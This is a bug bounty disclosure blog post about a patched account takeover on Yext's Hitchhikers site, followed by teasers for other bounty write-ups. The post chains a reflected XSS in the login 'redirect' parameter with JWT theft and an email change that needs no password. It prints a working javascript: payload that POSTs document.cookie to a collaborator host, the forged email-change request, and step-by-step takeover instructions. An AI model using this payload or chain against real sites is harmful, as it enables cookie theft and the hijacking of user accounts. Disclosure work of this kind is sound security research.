Yext -- Account Takeover on Yext via Reflected XSS on https://hitchhikers.yext.com/login via `redirect` parameter

-

 Company Information : 



Yext is a New York-based online marketing and search company. It offers brand updates using its cloud-based network of apps, search engines and other facilities. The company was founded in 2006 by Howard Lerman, Brian Distelburger, and Brent Metz. Its 2021 market cap was $2.0 billion and revenue was $354.7 million.


Bug Category : 

Cross-site-scripting (XSS) :
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.



Target  Information : 

https://www.yext.com/index.html


Technical Details of the Bug : 

There are multiple bugs which leads to Account takeover of any hitchhikers Account. I am describing each bug in description and then i will chain them to ATO.

Description :

Reflected XSS :

There is a reflected XSS on the login which works in authenticated session too. https://hitchhikers.yext.com/login?redirect=javascript%3Aalert%28document.cookie%29

Steal JWT Token in cookies :

The main JWT token to run hitchhikers account and APIs is getting stored in cookies . Due to this with the XSS it's possible to steal the JWT token.

No Extra protection in email change :

There is no additional protection like current password in change email request. Which makes attacker to change the email just with normal request with JWT token. ##Vulnerable HTTP request of email change :
PUT /hitchhikerusers/user HTTP/1.1 2Host: sandbox.yext.com 3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:75.0) Gecko/20100101 Firefox/75.0 4Accept: */* 5Accept-Language: en-US,en;q=0.5 6Accept-Encoding: gzip, deflate 7Referer: https://hitchhikers.yext.com/profile/settings/general/ 8X-Use-Cookie: 1 9Content-Type: application/json 10Authorization: Bearer 11Origin: https://hitchhikers.yext.com 12Content-Length: 44 13Connection: close 14 15{"email":""}


Chaining the attack Steps:

1.Login from victim account . 2.Run the XSS in victim account and copy the cookies. 3.Now capture the JWT token from the cookies . 4.Now run the Email change request with captured JWT token and change the email to attacker email. 5.New email confirmation will come to attacker email. 6.confirm the email and then request a new password with new email. 7.Change the password . 8.Now victim account will have attacker's email and password . Now victim can't even recover it's account .

New payload to steal JWT token/Cookie :

payload : javascript%3Afetch(%27https%3A%2F%2F[BURP_Collaborator]%27%2C%20%7B%0Amethod%3A%20%27POST%27%2C%0Amode%3A%20%27no-cors%27%2C%0Abody%3Adocument.cookie%0A%7D)%3B
Vulnerable URL : https://hitchhikers.yext.com/login?redirect=javascript%3Afetch(%27https%3A%2F%2F[BURP_Collaborator]%27%2C%20%7B%0Amethod%3A%20%27POST%27%2C%0Amode%3A%20%27no-cors%27%2C%0Abody%3Adocument.cookie%0A%7D)%3B
I am using burp Collaborator in my POC. the reference code can be found below article. https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies after opening this , check for the solution code and you will see how to fetch the cookie to your server code.



Once Attacker get this JWT token , all further steps attacker can do from his side without victim interaction . After capturing the JWT token , attacker can run the email change request(given below ) with captured JWT token and victim's email will change.

Vulnerable HTTP request of email change :

PUT /hitchhikerusers/user HTTP/1.1 2Host: sandbox.yext.com 3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:75.0) Gecko/20100101 Firefox/75.0 4Accept: */* 5Accept-Language: en-US,en;q=0.5 6Accept-Encoding: gzip, deflate 7Referer: https://hitchhikers.yext.com/profile/settings/general/ 8X-Use-Cookie: 1 9Content-Type: application/json 10Authorization: Bearer TOKEN 11Origin: https://hitchhikers.yext.com 12Content-Length: 44 13Connection: close 14 15{"email":""}


In the Token place the captured token and run the request with new email. You will notice that victim's email will be changed.
In the next step attacker can verify the email and change the victim's email . Now attacker can change the password for full account takeover.

Impact : 

Complete Account takeover of any account on https://hitchhikers.yext.com by chaining multiple bugs


Timeline : 

Oct 01th 2020: Report send to Yext product Security Team through Hackerone.

Oct 27th 2020:  Report Accepted and Triaged.

Nov 02th 2020:  Complete issue was resolved and confirmed.

Nov 20th 2020:   2000$ Bounty Rewarded

Comments

Post a Comment

Popular posts from this blog

Account Takeover Apple App Store Connect Account of Any user and Steal Developer API/Subscription Keys of any user(CORS+XSS) worth 8500$

-
Image
Company Information :  Apple Inc. is an American multinational technology company headquartered in Cupertino, California. As of March 2023, Apple is the world's biggest company by market capitalization, and with US$394.3 billion the largest technology company by 2022 revenue. Bug Category :  Cross-origin resource sharing (CORS) : Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources on a web page to be accessed from another domain outside the domain from which the first resource was served. A web page may freely embed cross-origin images, stylesheets, scripts, iframes, and videos. Stored Cross-site-scripting (XSS) : Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. Impact : 1.Stealing  App Store connect API key with Full Access , Subs...
Read more

Amazon Web Services : Takeover Workbook and delete the Owner on https://builder.honeycode.aws by collaborator user (IDOR) worth 7200$

-
Image
  Company Information :  Amazon Web Services, Inc. is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered, pay-as-you-go basis. Clients will often use this in combination with autoscaling. Bug Category :  Insecure direct object reference(IDOR ) :  Insecure direct object reference is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication. Target  Information :  https://builder.honeycode.aws/ Technical Details of the Bug :  On https://builder.honeycode.aws you can add workbook and add users as collaborator. collaborator have limited access to the functionalities and sharing part. But there is a way which can lead to collaborator to demote the owner , remove him ...
Read more

UnAuth Access to Twitter Private Tweets and messages Media Content Access(IDOR)

-
Image
Company Info : Twitter is an online news and social networking service where users post and interact with messages, "tweets", restricted to 140 characters. Registered users can post tweets, but those who are unregistered can only read them. Users access Twitter through its website interface, SMS or a mobile device app.Twitter Inc. is based in San Francisco, California, United States, and has more than 25 offices around the world. Bug category : Indirect Object Reference(IDOR) Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References Technical Details of the Bug :  Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified. Bug Des...
Read more